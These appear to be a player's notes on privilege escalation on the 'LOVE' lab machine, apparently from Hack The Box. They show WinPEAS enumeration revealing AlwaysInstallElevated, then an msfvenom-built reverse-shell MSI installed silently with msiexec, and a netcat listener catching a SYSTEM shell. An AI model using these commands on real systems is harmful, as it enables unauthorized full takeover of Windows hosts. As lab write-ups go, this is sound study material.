3 privesc

systeminfo

Host Name:                 LOVE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
System Type:               x64-based PC

PEAS

copy \\10.10.14.119\drive\win.exe
       1 file(s) copied.
   	
[+] Cached Creds
  [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
   cachedlogonscount is 10
   
[+] UAC Status
  [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
   ConsentPromptBehaviorAdmin: 0 - No prompting
   EnableLUA: 1
   LocalAccountTokenFilterPolicy: 1
   FilterAdministratorToken: 0
     [*] LocalAccountTokenFilterPolicy set to 1.
     [+] Any local account can be used for lateral movement.

[+] PowerShell Settings
   PowerShell v2 Version: 2.0
   PowerShell v5 Version: 5.1.19041.1
   PowerShell Core Version:
   Transcription Settings:
   Module Logging Settings:
   Scriptblock Logging Settings:
   PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
   PS history size: 51B

[+] Checking AlwaysInstallElevated
  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
   AlwaysInstallElevated set to 1 in HKLM!
   AlwaysInstallElevated set to 1 in HKCU!
   
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default

Using https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.119 LPORT=7070 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi

copy \\10.10.14.119\drive\reverse.msi
        1 file(s) copied.

msiexec /quiet /i reverse.msi

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52606
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

whoami
nt authority\system

Last updated